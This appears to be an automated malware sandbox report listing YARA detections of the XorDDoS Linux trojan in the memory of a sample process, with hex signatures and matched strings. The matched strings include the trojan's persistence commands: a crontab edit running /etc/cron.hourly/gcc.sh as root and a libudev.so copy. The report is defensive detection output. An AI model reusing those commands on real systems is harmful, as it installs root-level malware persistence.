6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6455.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6455.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6455.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6455.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6455.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6455.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6455.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6521.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6521.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6521.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6521.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6521.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6521.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6521.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6258.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6258.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6258.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6258.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6258.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6258.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6258.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Process Memory Space: TmoTjBkSXT.elf PID: 6220	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6220	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6222	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6222	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1082:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x115f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6223	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6223	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd4c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe29:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6224	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6224	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6253	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6253	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd4c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe29:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6256	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6256	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6258	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6258	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21d3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x22b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6261	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6261	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd46:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe23:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6264	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6264	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1065:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1142:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6271	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6271	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1186:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1263:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6274	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6274	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6276	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6276	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1193:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1270:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6279	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6279	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21cd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x22aa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6281	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6281	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9c6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xaa3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6288	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6288	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1eae:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f8b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6291	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6291	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6293	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6293	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6296	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6296	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d2c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e09:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
